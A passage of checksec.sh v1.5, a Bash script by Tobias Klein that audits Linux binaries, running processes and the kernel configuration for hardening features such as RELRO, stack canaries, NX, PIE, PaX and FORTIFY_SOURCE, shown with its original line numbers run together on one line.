BE LIABLE FOR ANY DIRECT, INDIRECT, 28 | # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, 29 | # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS 30 | # OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED 31 | # AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 32 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF 33 | # THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH 34 | # DAMAGE. 35 | # 36 | # Name : checksec.sh 37 | # Version : 1.5 38 | # Author : Tobias Klein 39 | # Date : November 2011 40 | # Download: http://www.trapkit.de/tools/checksec.html 41 | # Changes : http://www.trapkit.de/tools/checksec_changes.txt 42 | # 43 | # Description: 44 | # 45 | # Modern Linux distributions offer some mitigation techniques to make it 46 | # harder to exploit software vulnerabilities reliably. Mitigations such 47 | # as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout 48 | # Randomization (ASLR) and Position Independent Executables (PIE) have 49 | # made reliably exploiting any vulnerabilities that do exist far more 50 | # challenging. The checksec.sh script is designed to test what *standard* 51 | # Linux OS and PaX (http://pax.grsecurity.net/) security features are being 52 | # used. 53 | # 54 | # As of version 1.3 the script also lists the status of various Linux kernel 55 | # protection mechanisms. 56 | # 57 | # Credits: 58 | # 59 | # Thanks to Brad Spengler (grsecurity.net) for the PaX support. 60 | # Thanks to Jon Oberheide (jon.oberheide.org) for the kernel support. 61 | # Thanks to Ollie Whitehouse (Research In Motion) for rpath/runpath support. 62 | # 63 | # Others that contributed to checksec.sh (in no particular order): 64 | # 65 | # Simon Ruderich, Denis Scherbakov, Stefan Kuttler, Radoslaw Madej, 66 | # Anthony G. Basile, Martin Vaeth and Brian Davis. 67 | # 68 | 69 | # global vars 70 | have_readelf=1 71 | verbose=false 72 | 73 | # FORTIFY_SOURCE vars 74 | FS_end=_chk 75 | FS_cnt_total=0 76 | FS_cnt_checked=0 77 | FS_cnt_unchecked=0 78 | FS_chk_func_libc=0 79 | FS_functions=0 80 | FS_libc=0 81 | 82 | # version information 83 | version() { 84 | echo "checksec v1.5, Tobias Klein, www.trapkit.de, November 2011" 85 | echo 86 | } 87 | 88 | # help 89 | help() { 90 | echo "Usage: checksec [OPTION]" 91 | echo 92 | echo "Options:" 93 | echo 94 | echo " --file " 95 | echo " --dir [-v]" 96 | echo " --proc " 97 | echo " --proc-all" 98 | echo " --proc-libs " 99 | echo " --kernel" 100 | echo " --fortify-file " 101 | echo " --fortify-proc " 102 | echo " --version" 103 | echo " --help" 104 | echo 105 | echo "For more information, see:" 106 | echo " http://www.trapkit.de/tools/checksec.html" 107 | echo 108 | } 109 | 110 | # check if command exists 111 | command_exists () { 112 | type $1 > /dev/null 2>&1; 113 | } 114 | 115 | # check if directory exists 116 | dir_exists () { 117 | if [ -d $1 ] ; then 118 | return 0 119 | else 120 | return 1 121 | fi 122 | } 123 | 124 | # check user privileges 125 | root_privs () { 126 | if [ $(/usr/bin/id -u) -eq 0 ] ; then 127 | return 0 128 | else 129 | return 1 130 | fi 131 | } 132 | 133 | # check if input is numeric 134 | isNumeric () { 135 | echo "$@" | grep -q -v "[^0-9]" 136 | } 137 | 138 | # check if input is a string 139 | isString () { 140 | echo "$@" | grep -q -v "[^A-Za-z]" 141 | } 142 | 143 | # check file(s) 144 | filecheck() { 145 | # check for RELRO support 146 | if readelf -l $1 2>/dev/null | grep -q 'GNU_RELRO'; then 147 | if readelf -d $1 2>/dev/null | grep -q 'BIND_NOW'; then 148 | echo -n -e '\033[32mFull RELRO \033[m ' 149 | else 150 | echo -n -e '\033[33mPartial RELRO\033[m ' 151 | fi 152 | else 153 | echo -n -e '\033[31mNo RELRO \033[m ' 154 | fi 155 | 156 | # check for stack canary support 157 | if readelf -s $1 2>/dev/null | grep -q '__stack_chk_fail'; then 158 | echo -n -e '\033[32mCanary found \033[m ' 159 | else 160 | echo -n -e '\033[31mNo canary found\033[m ' 161 | fi 162 | 163 | # check for NX support 164 | if readelf -W -l $1 2>/dev/null | grep 'GNU_STACK' | grep -q 'RWE'; then 165 | echo -n -e '\033[31mNX disabled\033[m ' 166 | else 167 | echo -n -e '\033[32mNX enabled \033[m ' 168 | fi 169 | 170 | # check for PIE support 171 | if readelf -h $1 2>/dev/null | grep -q 'Type:[[:space:]]*EXEC'; then 172 | echo -n -e '\033[31mNo PIE \033[m ' 173 | elif readelf -h $1 2>/dev/null | grep -q 'Type:[[:space:]]*DYN'; then 174 | if readelf -d $1 2>/dev/null | grep -q '(DEBUG)'; then 175 | echo -n -e '\033[32mPIE enabled \033[m ' 176 | else 177 | echo -n -e '\033[33mDSO \033[m ' 178 | fi 179 | else 180 | echo -n -e '\033[33mNot an ELF file\033[m ' 181 | fi 182 | 183 | # check for rpath / run path 184 | if readelf -d $1 2>/dev/null | grep -q 'rpath'; then 185 | echo -n -e '\033[31mRPATH \033[m ' 186 | else 187 | echo -n -e '\033[32mNo RPATH \033[m ' 188 | fi 189 | 190 | if readelf -d $1 2>/dev/null | grep -q 'runpath'; then 191 | echo -n -e '\033[31mRUNPATH \033[m ' 192 | else 193 | echo -n -e '\033[32mNo RUNPATH \033[m ' 194 | fi 195 | } 196 | 197 | # check process(es) 198 | proccheck() { 199 | # check for RELRO support 200 | if readelf -l $1/exe 2>/dev/null | grep -q 'Program Headers'; then 201 | if readelf -l $1/exe 2>/dev/null | grep -q 'GNU_RELRO'; then 202 | if readelf -d $1/exe 2>/dev/null | grep -q 'BIND_NOW'; then 203 | echo -n -e '\033[32mFull RELRO \033[m ' 204 | else 205 | echo -n -e '\033[33mPartial RELRO \033[m ' 206 | fi 207 | else 208 | echo -n -e '\033[31mNo RELRO \033[m ' 209 | fi 210 | else 211 | echo -n -e '\033[31mPermission denied (please run as root)\033[m\n' 212 | exit 1 213 | fi 214 | 215 | # check for stack canary support 216 | if readelf -s $1/exe 2>/dev/null | grep -q 'Symbol table'; then 217 | if readelf -s $1/exe 2>/dev/null | grep -q '__stack_chk_fail'; then 218 | echo -n -e '\033[32mCanary found \033[m ' 219 | else 220 | echo -n -e '\033[31mNo canary found \033[m ' 221 | fi 222 | else 223 | if [ "$1" != "1" ] ; then 224 | echo -n -e '\033[33mPermission denied \033[m ' 225 | else 226 | echo -n -e '\033[33mNo symbol table found\033[m ' 227 | fi 228 | fi 229 | 230 | # first check for PaX support 231 | if cat $1/status 2> /dev/null | grep -q 'PaX:'; then 232 | pageexec=( $(cat $1/status 2> /dev/null | grep 'PaX:' | cut -b6) ) 233 | segmexec=( $(cat $1/status 2> /dev/null | grep 'PaX:' | cut -b10) ) 234 | mprotect=( $(cat $1/status 2> /dev/null | grep 'PaX:' | cut -b8) ) 235 | randmmap=( $(cat $1/status 2> /dev/null | grep 'PaX:' | cut -b9) ) 236 | if [[ "$pageexec" = "P" || "$segmexec" = "S" ]] && [[ "$mprotect" = "M" && "$randmmap" = "R" ]] ; then 237 | echo -n -e '\033[32mPaX enabled\033[m ' 238 | elif [[ "$pageexec" = "p" && "$segmexec" = "s" && "$randmmap" = "R" ]] ; then 239 | echo -n -e '\033[33mPaX ASLR only\033[m ' 240 | elif [[ "$pageexec" = "P" || "$segmexec" = "S" ]] && [[ "$mprotect" = "m" && "$randmmap" = "R" ]] ; then 241 | echo -n -e '\033[33mPaX mprot off \033[m' 242 | elif [[ "$pageexec" = "P" || "$segmexec" = "S" ]] && [[ "$mprotect" = "M" && "$randmmap" = "r" ]] ; then 243 | echo -n -e '\033[33mPaX ASLR off\033[m ' 244 | elif [[ "$pageexec" = "P" || "$segmexec" = "S" ]] && [[ "$mprotect" = "m" && "$randmmap" = "r" ]] ; then 245 | echo -n -e '\033[33mPaX NX only\033[m ' 246 | else 247 | echo -n -e '\033[31mPaX disabled\033[m ' 248 | fi 249 | # fallback check for NX support 250 | elif readelf -W -l $1/exe 2>/dev/null | grep 'GNU_STACK' | grep -q 'RWE'; then 251 | echo -n -e '\033[31mNX disabled\033[m ' 252 | else 253 | echo -n -e '\033[32mNX enabled \033[m ' 254 | fi 255 | 256 | # check for PIE support 257 | if readelf -h $1/exe 2>/dev/null | grep -q 'Type:[[:space:]]*EXEC'; then 258 | echo -n -e '\033[31mNo PIE \033[m ' 259 | elif readelf -h $1/exe 2>/dev/null | grep -q 'Type:[[:space:]]*DYN'; then 260 | if readelf -d $1/exe 2>/dev/null | grep -q '(DEBUG)'; then 261 | echo -n -e '\033[32mPIE enabled \033[m ' 262 | else 263 | echo -n -e '\033[33mDynamic Shared Object\033[m ' 264 | fi 265 | else 266 | echo -n -e '\033[33mNot an ELF file \033[m ' 267 | fi 268 | } 269 | 270 | # check mapped libraries 271 | libcheck() { 272 | libs=( $(awk '{ print $6 }' /proc/$1/maps | grep '/' | sort -u | xargs file | grep ELF | awk '{ print $1 }' | sed 's/:/ /') ) 273 | 274 | printf "\n* Loaded libraries (file information, # of mapped files: ${#libs[@]}):\n\n" 275 | 276 | for element in $(seq 0 $((${#libs[@]} - 1))) 277 | do 278 | echo " ${libs[$element]}:" 279 | echo -n " " 280 | filecheck ${libs[$element]} 281 | printf "\n\n" 282 | done 283 | } 284 | 285 | # check for system-wide ASLR support 286 | aslrcheck() { 287 | # PaX ASLR support 288 | if !(cat /proc/1/status 2> /dev/null | grep -q 'Name:') ; then 289 | echo -n -e ':\033[33m insufficient privileges for PaX ASLR checks\033[m\n' 290 | echo -n -e ' Fallback to standard Linux ASLR check' 291 | fi 292 | 293 | if cat /proc/1/status 2> /dev/null | grep -q 'PaX:'; then 294 | printf ": " 295 | if cat /proc/1/status 2> /dev/null | grep 'PaX:' | grep -q 'R'; then 296 | echo -n -e '\033[32mPaX ASLR enabled\033[m\n\n' 297 | else 298 | echo -n -e '\033[31mPaX ASLR disabled\033[m\n\n' 299 | fi 300 | else 301 | # standard Linux 'kernel.randomize_va_space' ASLR support 302 | # (see the kernel file 'Documentation/sysctl/kernel.txt' for a detailed description) 303 | printf " (kernel.randomize_va_space): " 304 | if /sbin/sysctl -a 2>/dev/null | grep -q 'kernel.randomize_va_space = 1'; then 305 | echo -n -e '\033[33mOn (Setting: 1)\033[m\n\n' 306 | printf " Description - Make the addresses of mmap base, stack and VDSO page randomized.\n" 307 | printf " This, among other things, implies that shared libraries will be loaded to \n" 308 | printf " random addresses. Also for PIE-linked binaries, the location of code start\n" 309 | printf " is randomized. Heap addresses are *not* randomized.\n\n" 310 | elif /sbin/sysctl -a 2>/dev/null | grep -q 'kernel.randomize_va_space = 2'; then 311 | echo -n -e '\033[32mOn (Setting: 2)\033[m\n\n' 312 | printf " Description - Make the addresses of mmap base, heap, stack and VDSO page randomized.\n" 313 | printf " This, among other things, implies that shared libraries will be loaded to random \n" 314 | printf " addresses. Also for PIE-linked binaries, the location of code start is randomized.\n\n" 315 | elif /sbin/sysctl -a 2>/dev/null | grep -q 'kernel.randomize_va_space = 0'; then 316 | echo -n -e '\033[31mOff (Setting: 0)\033[m\n' 317 | else 318 | echo -n -e '\033[31mNot supported\033[m\n' 319 | fi 320 | printf " See the kernel file 'Documentation/sysctl/kernel.txt' for more details.\n\n" 321 | fi 322 | } 323 | 324 | # check cpu nx flag 325 | nxcheck() { 326 | if grep -q nx /proc/cpuinfo; then 327 | echo -n -e '\033[32mYes\033[m\n\n' 328 | else 329 | echo -n -e '\033[31mNo\033[m\n\n' 330 | fi 331 | } 332 | 333 | # check for kernel protection mechanisms 334 | kernelcheck() { 335 | printf " Description - List the status of kernel protection mechanisms. Rather than\n" 336 | printf " inspect kernel mechanisms that may aid in the prevention of exploitation of\n" 337 | printf " userspace processes, this option lists the status of kernel configuration\n" 338 | printf " options that harden the kernel itself against attack.\n\n" 339 | printf " Kernel config: " 340 | 341 | if [ -f /proc/config.gz ] ; then 342 | kconfig="zcat /proc/config.gz" 343 | printf "\033[32m/proc/config.gz\033[m\n\n" 344 | elif [ -f /boot/config-`uname -r` ] ; then 345 | kconfig="cat /boot/config-`uname -r`" 346 | printf "\033[33m/boot/config-`uname -r`\033[m\n\n" 347 | printf " Warning: The config on disk may not represent running kernel config!\n\n"; 348 | elif [ -f "${KBUILD_OUTPUT:-/usr/src/linux}"/.config ] ; then 349 | kconfig="cat ${KBUILD_OUTPUT:-/usr/src/linux}/.config" 350 | printf "\033[33m%s\033[m\n\n" "${KBUILD_OUTPUT:-/usr/src/linux}/.config" 351 | printf " Warning: The config on disk may not represent running kernel config!\n\n"; 352 | else 353 | printf "\033[31mNOT FOUND\033[m\n\n" 354 | exit 0 355 | fi 356 | 357 | printf " GCC stack protector support: " 358 | if $kconfig | grep -qi 'CONFIG_CC_STACKPROTECTOR=y'; then 359 | printf "\033[32mEnabled\033[m\n" 360 | else 361 | printf "\033[31mDisabled\033[m\n" 362 | fi 363 | 364 | printf " Strict user copy checks: " 365 | if $kconfig | grep -qi 'CONFIG_DEBUG_STRICT_USER_COPY_CHECKS=y'; then 366 | printf "\033[32mEnabled\033[m\n" 367 | else 368 | printf "\033[31mDisabled\033[m\n" 369 | fi 370 | 371 | printf " Enforce read-only kernel data: " 372 | if $kconfig | grep -qi 'CONFIG_DEBUG_RODATA=y'; then 373 | printf "\033[32mEnabled\033[m\n" 374 | else 375 | printf "\033[31mDisabled\033[m\n" 376 | fi 377 | printf " Restrict /dev/mem access: " 378 | if $kconfig | grep -qi 'CONFIG_STRICT_DEVMEM=y'; then 379 | printf "\033[32mEnabled\033[m\n" 380 | else 381 | printf "\033[31mDisabled\033[m\n" 382 | fi 383 | 384 | printf " Restrict /dev/kmem access: " 385 | if $kconfig | grep -qi 'CONFIG_DEVKMEM=y'; then 386 | printf "\033[31mDisabled\033[m\n" 387 | else 388 | printf "\033[32mEnabled\033[m\n" 389 | fi 390 | 391 | printf "\n" 392 | printf "* grsecurity / PaX: " 393 | 394 | if $kconfig | grep -qi 'CONFIG_GRKERNSEC=y'; then 395 | if $kconfig | grep -qi 'CONFIG_GRKERNSEC_HIGH=y'; then 396 | printf "\033[32mHigh GRKERNSEC\033[m\n\n" 397 | elif $kconfig | grep -qi 'CONFIG_GRKERNSEC_MEDIUM=y'; then 398 | printf "\033[33mMedium GRKERNSEC\033[m\n\n" 399 | elif $kconfig | grep -qi 'CONFIG_GRKERNSEC_LOW=y'; then 400 | printf "\033[31mLow GRKERNSEC\033[m\n\n" 401 | else 402 | printf "\033[33mCustom GRKERNSEC\033[m\n\n" 403 | fi 404 | 405 | printf " Non-executable kernel pages: " 406 | if $kconfig | grep -qi 'CONFIG_PAX_KERNEXEC=y'; then 407 | printf "\033[32mEnabled\033[m\n" 408 | else 409 | printf "\033[31mDisabled\033[m\n" 410 | fi 411 | 412 | printf " Prevent userspace pointer deref: " 413 | if $kconfig | grep -qi 'CONFIG_PAX_MEMORY_UDEREF=y'; then 414 | printf "\033[32mEnabled\033[m\n" 415 | else 416 | printf "\033[31mDisabled\033[m\n" 417 | fi 418 | 419 | printf " Prevent kobject refcount overflow: " 420 | if $kconfig | grep -qi 'CONFIG_PAX_REFCOUNT=y'; then 421 | printf "\033[32mEnabled\033[m\n" 422 | else 423 | printf "\033[31mDisabled\033[m\n" 424 | fi 425 | 426 | printf " Bounds check heap object copies: " 427 | if $kconfig | grep -qi 'CONFIG_PAX_USERCOPY=y'; then 428 | printf "\033[32mEnabled\033[m\n" 429 | else 430 | printf "\033[31mDisabled\033[m\n" 431 | fi 432 | 433 | printf " Disable writing to kmem/mem/port: " 434 | if $kconfig | grep -qi 'CONFIG_GRKERNSEC_KMEM=y'; then 435 | printf "\033[32mEnabled\033[m\n" 436 | else 437 | printf "\033[31mDisabled\033[m\n" 438 | fi 439 | 440 | printf " Disable privileged I/O: " 441 | if $kconfig | grep -qi 'CONFIG_GRKERNSEC_IO=y'; then 442 | printf "\033[32mEnabled\033[m\n" 443 | else 444 | printf "\033[31mDisabled\033[m\n" 445 | fi 446 | 447 | printf " Harden module auto-loading: " 448 | if $kconfig | grep -qi 'CONFIG_GRKERNSEC_MODHARDEN=y'; then 449 | printf "\033[32mEnabled\033[m\n" 450 | else 451 | printf "\033[31mDisabled\033[m\n" 452 | fi 453 | 454 | printf " Hide kernel symbols: " 455 | if $kconfig | grep -qi 'CONFIG_GRKERNSEC_HIDESYM=y'; then 456 | printf "\033[32mEnabled\033[m\n" 457 | else 458 | printf "\033[31mDisabled\033[m\n" 459 | fi 460 | else 461 | printf "\033[31mNo GRKERNSEC\033[m\n\n" 462 | printf " The grsecurity / PaX patchset is available here:\n" 463 | printf " http://grsecurity.net/\n" 464 | fi 465 | 466 | printf "\n" 467 | printf "* Kernel Heap Hardening: " 468 | 469 | if $kconfig | grep -qi 'CONFIG_KERNHEAP=y'; then 470 | if $kconfig | grep -qi 'CONFIG_KERNHEAP_FULLPOISON=y'; then 471 | printf "\033[32mFull KERNHEAP\033[m\n\n" 472 | else 473 | printf "\033[33mPartial KERNHEAP\033[m\n\n" 474 | fi 475 | else 476 | printf "\033[31mNo KERNHEAP\033[m\n\n" 477 | printf " The KERNHEAP hardening patchset is available here:\n" 478 | printf " https://www.subreption.com/kernheap/\n\n" 479 | fi 480 | } 481 | 482 | # --- FORTIFY_SOURCE subfunctions (start) --- 483 | 484 | # is FORTIFY_SOURCE supported by libc? 485 | FS_libc_check() { 486 | printf "* FORTIFY_SOURCE support available (libc) : " 487 | 488 | if [ "${#FS_chk_func_libc[@]}" != "0" ] ; then 489 | printf "\033[32mYes\033[m\n" 490 | else 491 | printf "\033[31mNo\033[m\n" 492 | exit 1 493 | fi 494 | } 495 | 496 | # was the binary compiled with FORTIFY_SOURCE? 497 | FS_binary_check() { 498 | printf "* Binary compiled with FORTIFY_SOURCE support: " 499 | 500 | for FS_elem_functions in $(seq 0 $((${#FS_functions[@]} - 1))) 501 | do 502 | if [[ ${FS_functions[$FS_elem_functions]} =~ _chk ]] ; then 503 | printf "\033[32mYes\033[m\n" 504 | return 505 | fi 506 | done 507 | printf "\033[31mNo\033[m\n" 508 | exit 1 509 | } 510 | 511 | FS_comparison() { 512 | echo 513 | printf " ------ EXECUTABLE-FILE ------- . -------- LIBC --------\n" 514 | printf " FORTIFY-able library functions | Checked function names\n" 515 | printf " -------------------------------------------------------\n" 516 | 517 | for FS_elem_libc in $(seq 0 $((${#FS_chk_func_libc[@]} - 1))) 518 | do 519 | for FS_elem_functions in $(seq 0 $((${#FS_functions[@]} - 1))) 520 | do 521 | FS_tmp_func=${FS_functions[$FS_elem_functions]} 522 | FS_tmp_libc=${FS_chk_func_libc[$FS_elem_libc]} 523 | 524 | if [[ $FS_tmp_func =~ ^$FS_tmp_libc$ ]] ; then 525 | printf " \033[31m%-30s\033[m | __%s%s\n" $FS_tmp_func $FS_tmp_libc $FS_end 526 | let FS_cnt_total++ 527 | let FS_cnt_unchecked++ 528 | elif [[ $FS_tmp_func =~ ^$FS_tmp_libc(_chk) ]] ; then 529 | printf " \033[32m%-30s\033[m | __%s%s\n" $FS_tmp_func $FS_tmp_libc $FS_end 530 | let FS_cnt_total++ 531 | let FS_cnt_checked++ 532 | fi 533 | 534 | done 535 | done 536 | } 537 | 538 | FS_summary() { 539 | echo 540 | printf "SUMMARY:\n\n" 541 | printf "* Number of checked functions in libc : ${#FS_chk_func_libc[@]}\n" 542 | printf "* Total number of library functions in the executable: ${#FS_functions[@]}\n" 543 | printf "* Number of FORTIFY-able functions in the executable : %s\n" $FS_cnt_total 544 | printf "* Number of checked functions in the executable : \033[32m%s\033[m\n" $FS_cnt_checked 545 | printf "* Number of unchecked functions in the executable : \033[31m%s\033[m\n" $FS_cnt_unchecked 546 | echo 547 | } 548 | 549 | # --- FORTIFY_SOURCE subfunctions (end) --- 550 | 551 | if !(command_exists readelf) ; then 552 | printf "\033[31mWarning: 'readelf' not found! It's required for most checks.\033[m\n\n" 553 | have_readelf=0 554 | fi 555 | 556 | # parse command-line arguments 557 | case "$1" in 558 | 559 | --version) 560 | version 561 | exit 0 562 | ;; 563 | 564 | --help) 565 | help 566 | exit 0 567 | ;; 568 | 569 | --dir) 570 | if [ "$3" = "-v" ] ; then 571 | verbose=true 572 | fi 573 | if [ $have_readelf -eq 0 ] ; then 574 | exit 1 575 | fi 576 | if [ -z "$2" ] ; then 577 | printf "\033[31mError: Please provide a valid directory.\033[m\n\n" 578 | exit 1 579 | fi 580 | # remove trailing slashes 581 | tempdir=`echo $2 | sed -e "s/\/*$//"` 582 | if [ ! -d $tempdir ] ; then 583 | printf "\033[31mError: The directory '$tempdir' does not exist.\033[m\n\n" 584 | exit 1 585 | fi 586 | cd $tempdir 587 | printf "RELRO STACK CANARY NX PIE RPATH RUNPATH FILE\n" 588 | for N in [A-Za-z]*; do 589 | if [ "$N" != "[A-Za-z]*" ]; then 590 | # read permissions? 591 | if [ ! -r $N ]; then 592 | printf "\033[31mError: No read permissions for '$tempdir/$N' (run as root).\033[m\n" 593 | else 594 | # ELF executable? 595 | out=`file $N` 596 | if [[ ! $out =~ ELF ]] ; then 597 | if [ "$verbose" = "true" ] ; then 598 | printf "\033[34m*** Not an ELF file: $tempdir/" 599 | file $N 600 | printf "\033[m" 601 | fi 602 | else 603 | filecheck $N 604 | if [ `find $tempdir/$N \( -perm -004000 -o -perm -002000 \) -type f -print` ]; then 605 | printf "\033[37;41m%s%s\033[m" $2 $N 606 | else 607 | printf "%s%s" $tempdir/ $N 608 | fi 609 | echo 610 | fi 611 | fi 612 | fi 613 | done 614 | exit 0 615 | ;; 616 | 617 | --file) 618 | if [ $have_readelf -eq 0 ] ; then 619 | exit 1 620 | fi 621 | if [ -z "$2" ] ; then 622 | printf "\033[31mError: Please provide a valid file.\033[m\n\n" 623 | exit 1 624 | fi 625 | # does the file exist? 626 | if [ ! -e $2 ] ; then 627 | printf "\033[31mError: The file '$2' does not exist.\033[m\n\n" 628 | exit 1 629 | fi 630 | # read permissions? 631 | if [ ! -r $2 ] ; then 632 | printf "\033[31mError: No read permissions for '$2' (run as root).\033[m\n\n" 633 | exit 1 634 | fi 635 | # ELF executable? 636 | out=`file $2` 637 | if [[ ! $out =~ ELF ]] ; then 638 | printf "\033[31mError: Not an ELF file: " 639 | file $2 640 | printf "\033[m\n" 641 | exit 1 642 | fi 643 | printf "RELRO STACK CANARY NX PIE RPATH RUNPATH FILE\n" 644 | filecheck $2 645 | if [ `find $2 \( -perm -004000 -o -perm -002000 \) -type f -print` ] ; then 646 | printf "\033[37;41m%s%s\033[m" $2 $N 647 | else 648 | printf "%s" $2 649 | fi 650 | echo 651 | exit 0 652 | ;; 653 | 654 | --proc-all) 655 | if [ $have_readelf -eq 0 ] ; then 656 | exit 1 657 | fi 658 | cd /proc 659 | printf "* System-wide ASLR" 660 | aslrcheck 661 | printf "* Does the CPU support NX: " 662 | nxcheck 663 | printf " COMMAND PID RELRO STACK CANARY NX/PaX PIE\n" 664 | for N in [1-9]*; do 665 | if [ $N != $$ ] && readlink -q $N/exe > /dev/null; then 666 | printf "%16s" `head -1 $N/status | cut -b 7-` 667 | printf "%7d " $N 668 | proccheck $N 669 | echo 670 | fi 671 | done 672 | if [ ! -e /usr/bin/id ] ; then 673 | printf "\n\033[33mNote: If you are running 'checksec.sh' as an unprivileged user, you\n" 674 | printf " will not see all processes. Please run the script as root.\033[m\n\n" 675 | else 676 | if !(root_privs) ; then 677 | printf "\n\033[33mNote: You are running 'checksec.sh' as an unprivileged user.\n" 678 | printf " Too see all processes, please run the script as root.\033[m\n\n" 679 | fi 680 | fi 681 | exit 0 682 | ;; 683 | 684 | --proc) 685 | if [ $have_readelf -eq 0 ] ; then 686 | exit 1 687 | fi 688 | if [ -z "$2" ] ; then 689 | printf "\033[31mError: Please provide a valid process name.\033[m\n\n" 690 | exit 1 691 | fi 692 | if !(isString "$2") ; then 693 | printf "\033[31mError: Please provide a valid process name.\033[m\n\n" 694 | exit 1 695 | fi 696 | cd /proc 697 | printf "* System-wide ASLR" 698 | aslrcheck 699 | printf "* Does the CPU support NX: " 700 | nxcheck 701 | printf " COMMAND PID RELRO STACK CANARY NX/PaX PIE\n" 702 | for N in `ps -Ao pid,comm | grep $2 | cut -b1-6`; do 703 | if [ -d $N ] ; then 704 | printf "%16s" `head -1 $N/status | cut -b 7-` 705 | printf "%7d " $N 706 | # read permissions? 707 | if [ ! -r $N/exe ] ; then 708 | if !(root_privs) ; then 709 | printf "\033[31mNo read permissions for '/proc/$N/exe' (run as root).\033[m\n\n" 710 | exit 1 711 | fi 712 | if [ ! `readlink $N/exe` ] ; then 713 | printf "\033[31mPermission denied. Requested process ID belongs to a kernel thread.\033[m\n\n" 714 | exit 1 715 | fi 716 | exit 1 717 | fi 718 | proccheck $N 719 | echo 720 | fi 721 | done 722 | exit 0 723 | ;; 724 | 725 | --proc-libs) 726 | if [ $have_readelf -eq 0 ] ; then 727 | exit 1 728 | fi 729 | if [ -z "$2" ] ; then 730 | printf "\033[31mError: Please provide a valid process ID.\033[m\n\n" 731 | exit 1 732 | fi 733 | if !(isNumeric "$2") ; then 734 | printf "\033[31mError: Please provide a valid process ID.\033[m\n\n" 735 | exit 1 736 | fi 737 | cd /proc 738 | printf "* System-wide ASLR" 739 | aslrcheck 740 | printf "* Does the CPU support NX: " 741 | nxcheck 742 | printf "* Process information:\n\n" 743 | printf " COMMAND PID RELRO STACK CANARY NX/PaX PIE\n" 744 | N=$2 745 | if [ -d $N ] ; then 746 | printf "%16s" `head -1 $N/status | cut -b 7-` 747 | printf "%7d " $N 748 | # read permissions? 749 | if [ ! -r $N/exe ] ; then 750 | if !(root_privs) ; then 751 | printf "\033[31mNo read permissions for '/proc/$N/exe' (run as root).\033[m\n\n" 752 | exit 1 753 | fi 754 | if [ ! `readlink $N/exe` ] ; then 755 | printf "\033[31mPermission denied. Requested process ID belongs to a kernel thread.\033[m\n\n" 756 | exit 1 757 | fi 758 | exit 1 759 | fi 760 | proccheck $N 761 | echo 762 | libcheck $N 763 | fi 764 | exit 0 765 | ;; 766 | 767 | --kernel) 768 | cd /proc 769 | printf "* Kernel protection information:\n\n" 770 | kernelcheck 771 | exit 0 772 | ;; 773 | 774 | --fortify-file) 775 | if [ $have_readelf -eq 0 ] ; then 776 | exit 1 777 | fi 778 | if [ -z "$2" ] ; then 779 | printf "\033[31mError: Please provide a valid file.\033[m\n\n" 780 | exit 1 781 | fi 782 | # does the file exist? 783 | if [ ! -e $2 ] ; then 784 | printf "\033[31mError: The file '$2' does not exist.\033[m\n\n" 785 | exit 1 786 | fi 787 | # read permissions? 788 | if [ ! -r $2 ] ; then 789 | printf "\033[31mError: No read permissions for '$2' (run as root).\033[m\n\n" 790 | exit 1 791 | fi 792 | # ELF executable? 793 | out=`file $2` 794 | if [[ ! $out =~ ELF ]] ; then 795 | printf "\033[31mError: Not an ELF file: " 796 | file $2 797 | printf "\033[m\n" 798 | exit 1 799 | fi 800 | if [ -e /lib/libc.so.6 ] ; then 801 | FS_libc=/lib/libc.so.6 802 | elif [ -e /lib64/libc.so.6 ] ; then 803 | FS_libc=/lib64/libc.so.6 804 | elif [ -e /lib/i386-linux-gnu/libc.so.6 ] ; then 805 | FS_libc=/lib/i386-linux-gnu/libc.so.6 806 | elif [ -e /lib/x86_64-linux-gnu/libc.so.6 ] ; then 807 | FS_libc=/lib/x86_64-linux-gnu/libc.so.6 808 | else 809 | printf "\033[31mError: libc not found.\033[m\n\n" 810 | exit 1 811 | fi 812 | 813 | FS_chk_func_libc=( $(readelf -s $FS_libc | grep _chk@@ | awk '{ print $8 }' | cut -c 3- | sed -e 's/_chk@.*//') ) 814 | FS_functions=( $(readelf -s $2 | awk '{ print $8 }' | sed 's/_*//' | sed -e 's/@.*//') ) 815 | 816 | FS_libc_check 817 | FS_binary_check 818 | FS_comparison 819 | FS_summary 820 | 821 | exit 0 822 | ;; 823 | 824 | --fortify-proc) 825 | if [ $have_readelf -eq 0 ] ; then 826 | exit 1 827 | fi 828 | if [ -z "$2" ] ; then 829 | printf "\033[31mError: Please provide a valid process ID.\033[m\n\n" 830 | exit 1 831 | fi 832 | if !(isNumeric "$2") ; then 833 | printf "\033[31mError: Please provide a valid process ID.\033[m\n\n" 834 | exit 1 835 | fi 836 | cd /proc 837 | N=$2 838 | if [ -d $N ] ; then 839 | # read permissions? 840 | if [ ! -r $N/exe ] ; then 841 | if !(root_privs) ; then 842 | printf "\033[31mNo read permissions for '/proc/$N/exe' (run as root).\033[m\n\n" 843 | exit 1 844 | fi 845 | if [ ! `readlink $N/exe` ] ; then 846 | printf "\033[31mPermission denied. Requested process ID belongs to a kernel thread.\033[m\n\n" 847 | exit 1 848 | fi 849 | exit 1 850 | fi 851 | if [ -e /lib/libc.so.6 ] ; then 852 | FS_libc=/lib/libc.so.6 853 | elif [ -e /lib64/libc.so.6 ] ; then 854 | FS_libc=/lib64/libc.so.6 855 | elif [ -e /lib/i386-linux-gnu/libc.so.6 ] ; then 856 | FS_libc=/lib/i386-linux-gnu/libc.so.6 857 | elif [ -e /lib/x86_64-linux-gnu/libc.so.6 ] ; then 858 | FS_libc=/lib/x86_64-linux-gnu/libc.so.6 859 | else 860 | printf "\033[31mError: libc not found.\033[m\n\n" 861 | exit 1 862 | fi 863 | printf "* Process name (PID) : %s (%d)\n" `head -1 $N/status | cut -b 7-` $N 864 | FS_chk_func_libc=( $(readelf -s $FS_libc | grep _chk@@ | awk '{ print $8 }' | cut -c 3- | sed -e 's/_chk@.*//') ) 865 | FS_functions=( $(readelf -s $2/exe | awk '{ print $8 }' | sed 's/_*//' | sed -e 's/@.*//') ) 866 | 867 | FS_libc_check 868 | FS_binary_check 869 | FS_comparison 870 